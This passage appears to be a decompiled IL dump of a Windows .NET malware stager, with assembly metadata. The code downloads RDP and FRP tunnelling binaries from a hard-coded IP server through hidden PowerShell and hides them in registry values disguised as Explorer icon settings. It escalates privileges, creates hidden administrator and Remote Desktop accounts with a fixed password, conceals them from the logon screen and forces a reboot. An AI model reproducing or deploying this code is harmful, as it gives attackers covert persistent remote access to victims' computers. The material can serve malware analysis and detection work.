<null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_51 ldloc.s V_51 ldc.i4 30000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> ldstr gpupdate exit code: {0} ldloc.s V_51 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() box System.Int32 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_09A6: ldc.i4.1 ldloc.s V_51 brfalse.s IL_09A5: endfinally ldloc.s V_51 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.1 <null> stloc.s V_38 ldstr Configured user: ldloc.s V_45 call System.String System.String::Concat(System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_09E1: leave.s IL_09F1 stloc.s V_52 ldstr Error configuring candidate {0}: {1} ldloc.s V_45 ldloc.s V_52 call System.String System.String::Format(System.String,System.Object,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_09D5: ldloca.s V_41 ldloca.s V_41 call System.Boolean System.Collections.Generic.List`1/Enumerator<System.String>::MoveNext() brtrue IL_0773: ldloca.s V_41 leave.s IL_09F1: ldc.i4.0 ldloca.s V_41 constrained. System.Collections.Generic.List`1/Enumerator<System.String> callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.0 <null> stloc.s V_40 ldstr if (Get-LocalUser | Where-Object { $_.Description -eq ' ldloc.s V_39 ldstr ' }) { exit 1 } else { exit 0 } call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_53 ldstr powershell ldstr -Command " ldloc.s V_53 ldstr " call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_54 ldloc.s V_54 callvirt System.Void System.Diagnostics.Process::WaitForExit() ldloc.s V_54 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() ldc.i4.1 <null> bne.un.s IL_0A56: leave.s IL_0A64 ldc.i4.1 <null> stloc.s V_40 ldstr A user with the 'SysMaintenance' description already exists. Skipping creation. ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0A64: leave.s IL_0A7C ldloc.s V_54 brfalse.s IL_0A63: endfinally ldloc.s V_54 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0A7C: ldloc.s V_38 stloc.s V_55 ldstr Error checking for existing maintenance user: {0} ldloc.s V_55 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0A7C: ldloc.s V_38 ldloc.s V_38 brtrue IL_0CDB: leave.s IL_0CF3 ldloc.s V_40 brtrue IL_0CDB: leave.s IL_0CF3 ldstr Creating new local user ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.3 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr Administrator stelem.ref <null> dup <null> ldc.i4.1 <null> ldstr Admin stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr Windows stelem.ref <null> stloc.s V_56 ldc.i4.0 <null> stloc.s V_57 br IL_0CC1: ldloc.s V_57 ldloc.s V_56 ldloc.s V_57 ldelem.ref <null> stloc.s V_58 ldstr net ldc.i4.5 <null> newarr System.String dup <null> ldc.i4.0 <null> ldstr user " stelem.ref <null> dup <null> ldc.i4.1 <null> ldloc.s V_58 stelem.ref <null> dup <null> ldc.i4.2 <null> ldstr " "ADAD" /add /comment:" stelem.ref <null> dup <null> ldc.i4.3 <null> ldloc.s V_39 stelem.ref <null> dup <null> ldc.i4.4 <null> ldstr " stelem.ref <null> call System.String System.String::Concat(System.String[]) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_59 ldloc.s V_59 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardOutput() callvirt System.String System.IO.TextReader::ReadToEnd() pop <null> ldloc.s V_59 callvirt System.IO.StreamReader System.Diagnostics.Process::get_StandardError() callvirt System.String System.IO.TextReader::ReadToEnd() pop <null> ldloc.s V_59 ldc.i4 10000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> ldloc.s V_59 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() brtrue IL_0C96: ldstr "Failed to create user " ldstr powershell ldstr -Command "Add-LocalGroupMember -Group (Get-LocalGroup -SID 'S-1-5-32-544') -Member ' ldloc.s V_58 ldstr '" call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_60 ldloc.s V_60 ldc.i4 5000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_0BAA: ldstr "powershell" ldloc.s V_60 brfalse.s IL_0BA9: endfinally ldloc.s V_60 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr powershell ldstr -Command "Add-LocalGroupMember -Group (Get-LocalGroup -SID 'S-1-5-32-555') -Member ' ldloc.s V_58 ldstr '" call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_61 ldloc.s V_61 ldc.i4 5000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_0C03: ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldloc.s V_61 brfalse.s IL_0C02: endfinally ldloc.s V_61 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon\SpecialAccounts\UserList callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::CreateSubKey(System.String) stloc.s V_62 ldloc.s V_62 ldloc.s V_58 ldc.i4.0 <null> box System.Int32 ldc.i4.4 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) leave.s IL_0C32: ldstr "gpupdate" ldloc.s V_62 brfalse.s IL_0C31: endfinally ldloc.s V_62 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldstr gpupdate ldstr /force newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_63 ldloc.s V_63 ldc.i4 30000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> leave.s IL_0C7F: ldc.i4.1 ldloc.s V_63 brfalse.s IL_0C7E: endfinally ldloc.s V_63 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldc.i4.1 <null> stloc.s V_38 ldstr Created and configured new user: ldloc.s V_58 call System.String System.String::Concat(System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0CCC: ldloc.s V_38 ldstr Failed to create user ldloc.s V_58 ldstr , trying next call System.String System.String::Concat(System.String,System.String,System.String) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0CBB: ldloc.s V_57 ldloc.s V_59 brfalse.s IL_0CBA: endfinally ldloc.s V_59 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_57 ldc.i4.1 <null> add <null> stloc.s V_57 ldloc.s V_57 ldloc.s V_56 ldlen <null> conv.i4 <null> blt IL_0ABD: ldloc.s V_56 ldloc.s V_38 brtrue.s IL_0CDB: leave.s IL_0CF3 ldstr Failed to create any new user ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0CF3: ldsfld System.Int32 StandaloneProgram.Program::integrity stloc.s V_64 ldstr Error configuring user(s): {0} ldloc.s V_64 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0CF3: ldsfld System.Int32 StandaloneProgram.Program::integrity ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> bne.un IL_0D8A: leave.s IL_0D96 ldstr Initiating reboot in 2 minutes for admin ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr shutdown ldstr /r /t 120 newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardOutput(System.Boolean) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_RedirectStandardError(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) stloc.s V_65 ldloc.s V_65 ldc.i4 10000 callvirt System.Boolean System.Diagnostics.Process::WaitForExit(System.Int32) pop <null> ldstr Reboot command exit code: {0} ldloc.s V_65 callvirt System.Int32 System.Diagnostics.Process::get_ExitCode() box System.Int32 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0D72: leave.s IL_0D96 ldloc.s V_65 brfalse.s IL_0D71: endfinally ldloc.s V_65 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0D96: ret stloc.s V_66 ldstr Error initiating reboot: {0} ldloc.s V_66 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0D96: ret leave.s IL_0D96: ret ldloc.0 <null> brfalse.s IL_0D95: endfinally ldloc.0 <null> callvirt System.Void System.Threading.Mutex::ReleaseMutex() endfinally <null> ret <null> |
| Module Name | vhhqjwoq.zfo.exe |
| Full Name | vhhqjwoq.zfo.exe |
| EntryPoint | System.Void StandaloneProgram.Program::Main() |
| Scope Name | vhhqjwoq.zfo.exe |
| Scope Type | ModuleDef |
| Kind | Windows |
| Runtime Version | v2.0.50727 |
| Tables Header Version | 512 |
| WinMD Version | <null> |
| Assembly Name | vhhqjwoq.zfo |
| Assembly Version | 0.0.0.0 |
| Assembly Culture | <null> |
| Has PublicKey | False |
| PublicKey Token | <null> |
| Target Framework | <null> |
| Total Strings | 218 |
| Main Method | System.Void StandaloneProgram.Program::Main() |
| Main IL Instruction Count | 1155 |
| Main IL | ldnull <null> stloc.0 <null> call System.Int32 StandaloneProgram.Program::DetermineIntegrity() stsfld System.Int32 StandaloneProgram.Program::integrity ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.4 <null> bne.un.s IL_001E: ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4 20000 call System.Void System.Threading.Thread::Sleep(System.Int32) ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> blt.s IL_0050: ldstr "C:\\Temp" ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.4 <null> beq.s IL_0035: ldstr "Global\\SystemStagerMutex" ldstr Global\AdminStagerMutex br.s IL_003A: stloc.s V_7 ldstr Global\SystemStagerMutex stloc.s V_7 ldc.i4.1 <null> ldloc.s V_7 ldloca.s V_8 newobj System.Void System.Threading.Mutex::.ctor(System.Boolean,System.String,System.Boolean&) stloc.0 <null> ldloc.s V_8 brtrue.s IL_0050: ldstr "C:\\Temp" leave IL_0D96: ret ldstr C:\Temp dup <null> call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldstr log{0}.txt ldsfld System.Int32 StandaloneProgram.Program::integrity box System.Int32 call System.String System.String::Format(System.String,System.Object) call System.String System.IO.Path::Combine(System.String,System.String) stsfld System.String StandaloneProgram.Program::logFile ldstr Determined integrity level: {0} (4=SYSTEM,3=Admin,2=User) ldsfld System.Int32 StandaloneProgram.Program::integrity box System.Int32 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr http://185.102.115.146:81 stloc.1 <null> ldloc.1 <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 44 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> ldstr http:// ldstr callvirt System.String System.String::Replace(System.String,System.String) ldstr https:// ldstr callvirt System.String System.String::Replace(System.String,System.String) ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 47 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 58 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> stloc.2 <null> ldloc.1 <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 44 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> ldstr /hosted/RDPWrapper.exe call System.String System.String::Concat(System.String,System.String) stloc.3 <null> ldloc.1 <null> ldc.i4.1 <null> newarr System.Char dup <null> ldc.i4.0 <null> ldc.i4.s 44 stelem.i2 <null> callvirt System.String[] System.String::Split(System.Char[]) ldc.i4.0 <null> ldelem.ref <null> ldstr /hosted/FRPWrapper.exe call System.String System.String::Concat(System.String,System.String) stloc.s V_4 ldc.i4.0 <null> stloc.s V_5 ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.0 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_10 ldloc.s V_10 brfalse.s IL_0162: leave.s IL_0170 ldloc.s V_10 ldstr IconSizeVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) brfalse.s IL_0162: leave.s IL_0170 ldc.i4.1 <null> stloc.s V_5 ldstr RDPWrapper already exists in HKLM, skipping download ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0170: ldloc.s V_5 ldloc.s V_10 brfalse.s IL_016F: endfinally ldloc.s V_10 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_5 brtrue IL_01FC: ldc.i4.0 ldstr Downloading RDPWrapper... ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer',$true).SetValue('IconSizeVersion1',(iwr ' ldloc.3 <null> ldstr ').Content,[Microsoft.Win32.RegistryValueKind]::Binary); call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_11 ldstr Running download command: ldloc.s V_11 call System.String System.String::Concat(System.String,System.String) ldc.i4.2 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr powershell ldstr -w Hidden -Command " ldloc.s V_11 ldstr " call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) callvirt System.Void System.Diagnostics.Process::WaitForExit() ldstr RDPWrapper downloaded to HKCU ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_01FC: ldc.i4.0 stloc.s V_12 ldstr Error downloading RDPWrapper: {0} ldloc.s V_12 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_01FC: ldc.i4.0 ldc.i4.0 <null> stloc.s V_6 ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.0 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_13 ldloc.s V_13 brfalse.s IL_0231: leave.s IL_023F ldloc.s V_13 ldstr IconUnderlineVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) brfalse.s IL_0231: leave.s IL_023F ldc.i4.1 <null> stloc.s V_6 ldstr FRP binary already exists in HKLM, skipping download ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_023F: ldloc.s V_6 ldloc.s V_13 brfalse.s IL_023E: endfinally ldloc.s V_13 callvirt System.Void System.IDisposable::Dispose() endfinally <null> ldloc.s V_6 brtrue IL_02CC: ldsfld System.Int32 StandaloneProgram.Program::integrity ldstr Downloading FRP binary... ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr [Microsoft.Win32.Registry]::CurrentUser.OpenSubKey('SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer',$true).SetValue('IconUnderlineVersion1',(iwr ' ldloc.s V_4 ldstr ').Content,[Microsoft.Win32.RegistryValueKind]::Binary); call System.String System.String::Concat(System.String,System.String,System.String) stloc.s V_14 ldstr Running FRP download command: ldloc.s V_14 call System.String System.String::Concat(System.String,System.String) ldc.i4.2 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldstr powershell ldstr -w h -c " ldloc.s V_14 ldstr " call System.String System.String::Concat(System.String,System.String,System.String) newobj System.Void System.Diagnostics.ProcessStartInfo::.ctor(System.String,System.String) dup <null> ldc.i4.1 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_CreateNoWindow(System.Boolean) dup <null> ldc.i4.0 <null> callvirt System.Void System.Diagnostics.ProcessStartInfo::set_UseShellExecute(System.Boolean) call System.Diagnostics.Process System.Diagnostics.Process::Start(System.Diagnostics.ProcessStartInfo) callvirt System.Void System.Diagnostics.Process::WaitForExit() ldstr FRP binary downloaded to HKCU ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_02CC: ldsfld System.Int32 StandaloneProgram.Program::integrity stloc.s V_15 ldstr Error downloading FRP binary: {0} ldloc.s V_15 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_02CC: ldsfld System.Int32 StandaloneProgram.Program::integrity ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.2 <null> bne.un.s IL_0319: ldsfld System.Int32 StandaloneProgram.Program::integrity ldstr Not admin/system, escalating privileges... ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldc.i4.0 <null> ldstr ShellStateVersion1 call System.String StandaloneProgram.Program::GetPowershellCommand(System.Boolean,System.String) call System.Diagnostics.Process StandaloneProgram.Program::RunAsAdmin(System.String) pop <null> ldstr Escalation attempted ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave IL_0D96: ret stloc.s V_16 ldstr Error in escalation: {0} ldloc.s V_16 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave IL_0D96: ret ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> blt IL_04EE: ldsfld System.Int32 StandaloneProgram.Program::integrity ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_17 ldloc.s V_17 brfalse.s IL_0396: leave.s IL_03A4 ldloc.s V_17 ldstr ShellStateVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) stloc.s V_18 ldloc.s V_18 brfalse.s IL_0396: leave.s IL_03A4 ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_19 ldloc.s V_19 brfalse.s IL_0388: leave.s IL_0396 ldloc.s V_19 ldstr ShellStateVersion1 ldloc.s V_18 ldc.i4.3 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) ldloc.s V_17 ldstr ShellStateVersion1 callvirt System.Void Microsoft.Win32.RegistryKey::DeleteValue(System.String) ldstr Moved implant data to HKLM ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0396: leave.s IL_03A4 ldloc.s V_19 brfalse.s IL_0395: endfinally ldloc.s V_19 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_03A4: leave.s IL_03BC ldloc.s V_17 brfalse.s IL_03A3: endfinally ldloc.s V_17 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_03BC: nop stloc.s V_20 ldstr Error moving registry data: {0} ldloc.s V_20 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_03BC: nop nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_21 ldloc.s V_21 brfalse.s IL_042F: leave.s IL_043D ldloc.s V_21 ldstr IconSizeVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) stloc.s V_22 ldloc.s V_22 brfalse.s IL_042F: leave.s IL_043D ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_23 ldloc.s V_23 brfalse.s IL_0421: leave.s IL_042F ldloc.s V_23 ldstr IconSizeVersion1 ldloc.s V_22 ldc.i4.3 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) ldloc.s V_21 ldstr IconSizeVersion1 callvirt System.Void Microsoft.Win32.RegistryKey::DeleteValue(System.String) ldstr Moved RDPWrapper data to HKLM ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_042F: leave.s IL_043D ldloc.s V_23 brfalse.s IL_042E: endfinally ldloc.s V_23 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_043D: leave.s IL_0455 ldloc.s V_21 brfalse.s IL_043C: endfinally ldloc.s V_21 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_0455: nop stloc.s V_24 ldstr Error moving RDPWrapper data: {0} ldloc.s V_24 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_0455: nop nop <null> ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::CurrentUser ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_25 ldloc.s V_25 brfalse.s IL_04C8: leave.s IL_04D6 ldloc.s V_25 ldstr IconUnderlineVersion1 callvirt System.Object Microsoft.Win32.RegistryKey::GetValue(System.String) stloc.s V_26 ldloc.s V_26 brfalse.s IL_04C8: leave.s IL_04D6 ldsfld Microsoft.Win32.RegistryKey Microsoft.Win32.Registry::LocalMachine ldstr Software\Microsoft\Windows\CurrentVersion\Explorer ldc.i4.1 <null> callvirt Microsoft.Win32.RegistryKey Microsoft.Win32.RegistryKey::OpenSubKey(System.String,System.Boolean) stloc.s V_27 ldloc.s V_27 brfalse.s IL_04BA: leave.s IL_04C8 ldloc.s V_27 ldstr IconUnderlineVersion1 ldloc.s V_26 ldc.i4.3 <null> callvirt System.Void Microsoft.Win32.RegistryKey::SetValue(System.String,System.Object,Microsoft.Win32.RegistryValueKind) ldloc.s V_25 ldstr IconUnderlineVersion1 callvirt System.Void Microsoft.Win32.RegistryKey::DeleteValue(System.String) ldstr Moved FRP data to HKLM ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_04C8: leave.s IL_04D6 ldloc.s V_27 brfalse.s IL_04C7: endfinally ldloc.s V_27 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_04D6: leave.s IL_04EE ldloc.s V_25 brfalse.s IL_04D5: endfinally ldloc.s V_25 callvirt System.Void System.IDisposable::Dispose() endfinally <null> leave.s IL_04EE: ldsfld System.Int32 StandaloneProgram.Program::integrity stloc.s V_28 ldstr Error moving FRP data: {0} ldloc.s V_28 call System.String System.String::Format(System.String,System.Object) ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) leave.s IL_04EE: ldsfld System.Int32 StandaloneProgram.Program::integrity ldsfld System.Int32 StandaloneProgram.Program::integrity ldc.i4.3 <null> blt IL_05A9: ldsfld System.Int32 StandaloneProgram.Program::integrity ldstr C:\ProgramData\frp stloc.s V_29 ldloc.s V_29 ldstr frpc.toml call System.String System.IO.Path::Combine(System.String,System.String) stloc.s V_30 ldloc.s V_29 call System.Boolean System.IO.Directory::Exists(System.String) brtrue.s IL_053E: ldloc.s V_30 ldloc.s V_29 call System.IO.DirectoryInfo System.IO.Directory::CreateDirectory(System.String) pop <null> ldloc.s V_29 newobj System.Void System.IO.DirectoryInfo::.ctor(System.String) dup <null> callvirt System.IO.FileAttributes System.IO.FileSystemInfo::get_Attributes() ldc.i4.2 <null> or <null> callvirt System.Void System.IO.FileSystemInfo::set_Attributes(System.IO.FileAttributes) ldstr FRP directory created and hidden ldc.i4.1 <null> call System.Void StandaloneProgram.Program::Log(System.String,System.Int32) ldloc.s V_30 call 